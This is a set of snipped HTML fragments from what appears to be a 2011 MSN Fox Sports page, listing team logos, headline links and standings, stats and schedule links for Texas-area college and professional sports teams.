<li><a href="http://msn.foxsports.com/cfb/story/NCAA-Texas-Tech-broke-recruiting-rules-in-three-sports-010711">NCAA: Texas Tech broke recruiting rules</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Mike-Leach-thought-he-was-perfect-fit-for-Maryland-010411">Leach thought he was Terps match</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Texas-Tech-45-Northwestern-38-91337506">Texas Tech 45, Northwestern 38</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86128">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86128">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86112" title="SMU Mustangs"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/82.png" alt="SMU Mustangs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86112">SMU Mustangs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Army-holds-on-to-beat-SMU-in-the-Armed-Forces-Bowl-123010">Army caps first winning season since '96</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/ArmySMU-Preview-75693926">Army-SMU Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/UCF-edges-SMU-in-Conference-USA-Championship-Game-120410">UCF wins Conference USA championship</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/UCF-SMU-meet-for-Conference-USA-championship-36668645">UCF defeats SMU 17-7 to win Conference USA title</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86112">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86112">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86068" title="North Texas Eagles"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/182.png" alt="North Texas Eagles logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86068">North Texas Eagles</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Kansas-St-49-North-Texas-41-86875018">Kansas St. 49, North Texas 41</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/No-13-Virginia-Tech-37-Virginia-7-30594865">No. 13 Virginia Tech 37, Virginia 7</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Tuneup-for-Hokies-is-Cavaliers-bowl-game-90790195">Tuneup for Hokies is Cavaliers' bowl game</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Reserves-key-to-titles-bowls-for-some-ACC-teams-22352730">Reserves key to titles, bowls for some ACC teams</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86068">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86068">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/team?categoryId=86127" title="Baylor Bears"><img src="http://msn.foxsports.com/fe/img/CFB/TeamLogo/Large/79.png" alt="Baylor Bears logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cfb/team?categoryId=86127">Baylor Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/story/Canadian-jumps-from-fire-to-pro-football-88154560">Canadian jumps from fire to pro football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Leshoure-leads-Illinois-past-Baylor-in-Texas-Bowl-67062026">Leshoure leads Illinois past Baylor in Texas Bowl</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Illinois-beats-Baylor-for-rare-bowl-win-122910">Illinois finally tastes bowl victory</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cfb/story/Bears-make-first-bowl-appearance-since-1994-47130273">Bears make first bowl appearance since 1994</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cfb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cfb/teamStats?categoryId=86127">Stats</a></li><li><a href="http://msn.foxsports.com/cfb/teamSchedule?categoryId=86127">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cfb">College FB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/houston-rockets" title="Houston Rockets"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/10.png" alt="Houston Rockets logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/houston-rockets">Houston Rockets</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/RocketsSpurs-Preview-80260514">Rockets-Spurs Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Dallas-Mavericks-beat-Houston-Rockets-NBA-012711">Mavericks win fourth in five games</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/RocketsMavericks-Preview-22944154">Rockets-Mavericks Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/Rockets-96-Clippers-83-53563135">Rockets 96, Clippers 83</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/houston-rockets/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/houston-rockets/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks" title="Dallas Mavericks"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/6.png" alt="Dallas Mavericks logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/dallas-mavericks">Dallas Mavericks</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/HawksMavericks-Preview-77679106">Hawks-Mavericks Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Dallas-Mavericks-beat-Houston-Rockets-NBA-012711">Mavericks win fourth in five games</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/RocketsMavericks-Preview-22944154">Rockets-Mavericks Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/Mavericks-112-Clippers-105-88822399">Mavericks 112, Clippers 105</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/dallas-mavericks/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs" title="San Antonio Spurs"><img src="http://msn.foxsports.com/fe/img/NBA/TeamLogo/Large/24.png" alt="San Antonio Spurs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs">San Antonio Spurs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/story/Weighing-Ws-and-Ls-vs-numbers-in-AllStar-votes-33069128">Weighing W's and L's vs numbers in All-Star votes</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/RocketsSpurs-Preview-80260514">Rockets-Spurs Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba/story/Spurs-hand-Jazz-6th-straight-loss-012611">Spurs hand Jazz 6th straight loss</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nba/story/SpursJazz-Preview-36856822">Spurs-Jazz Preview</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs/stats">Stats</a></li><li><a href="http://msn.foxsports.com/nba/team/san-antonio-spurs/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71871" title="Baylor Bears"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/50.gif" alt="Baylor Bears logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71871">Baylor Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175">Baylor 70, Colorado 66</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Jimmermania-highlights-seasons-top-performances-13336281">Jimmermania highlights season's top performances</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Oneanddone-6plus-players-who-might-leave-quick-78004338">One-and-done? 6-plus players who might leave quick</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Kansas-St-69-Baylor-61-11058486">Kansas St. 69, Baylor 61</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71871">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71871">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71650" title="North Texas Eagles"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/415.gif" alt="North Texas Eagles logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71650">North Texas Eagles</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/LouisianaLafayette-93-North-Texas-88-50545535">Louisiana-Lafayette 93, North Texas 88</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/LouisianaLafayette-defeats-North-Texas-9388-18092539">Louisiana-Lafayette defeats North Texas 93-88</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/North-Texas-83-Arkansas-St-64-96725786">North Texas 83, Arkansas St. 64</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/North-Texas-79-LouisianaMonroe-62-59041039">North Texas 79, Louisiana-Monroe 62</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71650">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71650">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71926" title="SMU Mustangs"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/515.gif" alt="SMU Mustangs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71926">SMU Mustangs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/SMU-59-Tulsa-58-81254706">SMU 59, Tulsa 58</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/SMU-79-Southern-Miss-65-96624346">SMU 79, Southern Miss. 65</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/UAB-67-SMU-53-71299212">UAB 67, SMU 53</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Houston-70-SMU-68-53343248">Houston 70, SMU 68</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71926">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71926">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71780" title="Texas Arlington Mavericks"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/588.gif" alt="Texas Arlington Mavericks logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71780">Texas Arlington Mavericks</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/TexasArlington-62-Stephen-FAustin-52-85322240">Texas-Arlington 62, Stephen F.Austin 52</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/TexasArlington-70-Texas-AampMCorpus-Christi-49-49303869">Texas-Arlington 70, Texas A&amp,M-Corpus Christi 49</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Lamar-76-TexasArlington-72-22113261">Lamar 76, Texas-Arlington 72</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/TexasArlington-65-Sam-Houston-St-58-12896482">Texas-Arlington 65, Sam Houston St. 58</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71780">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71780">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71874" title="Texas Longhorns"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/585.gif" alt="Texas Longhorns logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71874">Texas Longhorns</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/MissouriTexas-Preview-94031904">Missouri-Texas Preview</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Sadler-must-look-beyond-borders-for-future-Huskers-50872138">Sadler must look beyond borders for future Huskers</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Oneanddone-6plus-players-who-might-leave-quick-78004338">One-and-done? 6-plus players who might leave quick</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/Texas-Longhorns-defeat-Oklahoma-State-on-10-year-crash-anniversary-012611">Cowboys honor those lost 10 years ago</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71874">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71874">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71872" title="Texas Tech Red Raiders"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/592.gif" alt="Texas Tech Red Raiders logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71872">Texas Tech Red Raiders</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Texas-Tech-92-Iowa-St-83-37630109">Texas Tech 92, Iowa St. 83</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Texas-Tech-72-Nebraska-71-91656634">Texas Tech 72, Nebraska 71</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Oklahoma-83-Texas-Tech-74-06947696">Oklahoma 83, Texas Tech 74</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/No-21-Kansas-St-94-Texas-Tech-60-93343325">No. 21 Kansas St. 94, Texas Tech 60</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71872">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71872">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/team?categoryId=71922" title="TCU Horned Frogs"><img src="http://msn.foxsports.com/fe/img/CBK/TeamLogo/Large/576.gif" alt="TCU Horned Frogs logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/cbk/team?categoryId=71922">TCU Horned Frogs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/story/Utah-75-TCU-62-52354638">Utah 75, TCU 62</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/No-9-BYU-83-TCU-67-33157554">No. 9 BYU 83, TCU 67</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Colorado-St-79-TCU-69-99128904">Colorado St. 79, TCU 69</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/cbk/story/TCU-78-Wyoming-60-47712021">TCU 78, Wyoming 60</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/cbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/cbk/teamStats?categoryId=71922">Stats</a></li><li><a href="http://msn.foxsports.com/cbk/teamSchedule?categoryId=71922">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/cbk">College BB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="SMU Mustangs - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/515.gif" alt="SMU Mustangs - Women logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/wcbk">SMU Mustangs - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="TCU Horned Frogs - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/576.gif" alt="TCU Horned Frogs - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">TCU Horned Frogs - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/No-20-TCU-78-Colorado-St-51-34049731">No. 20 TCU 78, Colorado St. 51</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/No-23-TCU-81-UNLV-61-58963977">No. 23 TCU 81, UNLV 61</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/No-22-TCU-80-San-Diego-St-63-56753002">No. 22 TCU 80, San Diego St. 63</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Wyoming-73-No-22-TCU-67-02071027">Wyoming 73, No. 22 TCU 67</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Texas Longhorns - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/585.gif" alt="Texas Longhorns - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Texas Longhorns - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/National-Team-Leaders3">National Team Leaders</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/CONNECTICUT-370-61746829">CONNECTICUT (38-0)</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Nebraskas-Yori-chosen-AP-coach-of-the-year-90044251">Nebraska's Yori chosen AP coach of the year</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Baylor-Lady-Bears-Roster-34247840">Baylor Lady Bears Roster</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Texas Tech Red Raiders - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/592.gif" alt="Texas Tech Red Raiders - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Texas Tech Red Raiders - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/Womens-NCAA-Championship-Winningest-Coaches-87055644">Women's NCAA Championship Winningest Coaches</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Fewest-Points-in-One-Half-NCAA-Tournament-07292331">Fewest Points in One Half - NCAA Tournament</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/Womens-NCAA-AllTournament-Teams-37687435">Women's NCAA All-Tournament Teams</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/OKLAHOMA-2710-68082171">OKLAHOMA (27-10)</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk" title="Baylor Bears - Women"><img src="http://msn.foxsports.com/fe/img/WCBK/TeamLogo/Large/50.gif" alt="Baylor Bears - Women logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wcbk">Baylor Bears - Women</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/story/National-Team-Leaders">National Team Leaders</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/NCAA-Womens-Final-Four-MVPs-25159731">NCAA Women's Final Four MVPs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wcbk/story/NCAA-Championship-Scores-81750110">NCAA Championship Scores</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wcbk/story/Baylors-future-bright-for-Griner-young-Bears-60468229">Baylor's future bright for Griner, young Bears</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wcbk/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wcbk/statsTeam">Stats</a></li><li><a href="http://msn.foxsports.com/wcbk/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wcbk">College BB Women</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba" title="San Antonio Silver Stars"><img src="http://msn.foxsports.com/fe/img/WNBA/TeamLogo/Large/8.gif" alt="San Antonio Silver Stars logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/wnba">San Antonio Silver Stars</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wnba/story/Leuchanka-leads-Belarus-to-7053-upset-of-Russia-67166762">Leuchanka leads Belarus to 70-53 upset of Russia</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba/story/USA-aims-to-reclaim-gold-at-womens-hoops-worlds-21153241">USA aiming for gold at women's basketball worlds</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/wnba/story/Mercury-92-Silver-Stars-73-19788864">Mercury 92, Silver Stars 73</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/wnba/story/Silver-Stars-92%2C-Mercury-91">Phoenix tops San Antonio 92-73 in WNBA playoffs</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/wnba/standings">Standings</a></li><li><a href="http://msn.foxsports.com/wnba/stats">Stats</a></li><li><a href="http://msn.foxsports.com/wnba/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/wnba">WNBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/team/houston-astros" title="Houston Astros"><img src="http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/18.gif" alt="Houston Astros logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/mlb/team/houston-astros">Houston Astros</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/story/Houston-Astros-reach-34M-3-year-deal-with-RHP-Wandy-Rodriguez-012511">Astros, Rodriguez reach 3-year deal</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Astros-pitcher-Carrillo-arrested-at-Fla-casino-03199288">Astros pitcher Carrillo arrested at Fla. casino</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Salary-Arbitration-Eligibles-List">Salary Arbitration Eligibles List</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/mlb/story/Astros-infielder-Keppinger-to-have-foot-surgery-48484608">Astros infielder Keppinger to have foot surgery</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/mlb/team/houston-astros/stats">Stats</a></li><li><a href="http://msn.foxsports.com/mlb/team/houston-astros/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/team/texas-rangers" title="Texas Rangers"><img src="http://msn.foxsports.com/fe/img/MLB/TeamLogo/Large/13.gif" alt="Texas Rangers logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/mlb/team/texas-rangers">Texas Rangers</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420">Rangers, Napoli avoid arbitration with $5.8M deal</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Orioles-hope-to-add-Guerrero-to-revamped-roster-83871116">Orioles hope to add Guerrero to revamped roster</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb/story/Padres-promote-Chris-Gwynn%2C-hire-Dave-Roberts">Padres reach deals with INF Cantu, RHP Burke</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/mlb/story/Rangers-trade-Francisco-to-Blue-Jays-for-Napoli-03177108">Rangers trade Francisco to Blue Jays for Napoli</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb/standings">Standings</a></li><li><a href="http://msn.foxsports.com/mlb/team/texas-rangers/stats">Stats</a></li><li><a href="http://msn.foxsports.com/mlb/team/texas-rangers/schedule">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/mlb">MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377" title="FC Dallas"><img src="http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5357.gif" alt="FC Dallas logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">FC Dallas</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/foxsoccer/mls/standings">Standings</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">Stats</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/FC-Dallas?categoryId=377">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/foxsoccer/mls">MLS</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382" title="Houston Dynamo"><img src="http://msn.foxsports.com/fe/fsi/img/futbol/teamLogo/statsInc/Large/5726.gif" alt="Houston Dynamo logo" width="80" height="80" /></a><div><span class="nonews"><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Houston Dynamo</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/foxsoccer/mls/standings">Standings</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Stats</a></li><li><a href="http://msn.foxsports.com/foxsoccer/mls/team/Houston-Dynamo?categoryId=382">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/foxsoccer/mls">MLS</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/team/dallas-stars" title="Dallas Stars"><img src="http://msn.foxsports.com/fe/img/NHL/TeamLogo/Large/9.png" alt="Dallas Stars logo" width="80" height="80" /></a><div><span><a href="http://msn.foxsports.com/nhl/team/dallas-stars">Dallas Stars</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nhl/story/Stars-3-Oilers-1-38835353">Stars 3, Oilers 1</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/story/Dallas-Stars-Jamie-Benn-Tom-Wandell-out-with-upper-body-injuries-012611">Stars' Benn, Wandell out</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl/story/OilersStars-Preview-96456130">Oilers-Stars Preview</a>
...[SNIP]...
<li class="last"><a href="http://msn.foxsports.com/nhl/story/Vancouver-Canucks-beat-Dallas-Stars-NHL-012411">Canucks score three in first five shots</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/nhl/standings">Standings</a></li><li><a href="http://msn.foxsports.com/nhl/team/dallas-stars/stats/">Stats</a></li><li><a href="http://msn.foxsports.com/nhl/team/dallas-stars/schedule/">Schedule</a></li><li class="last"><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
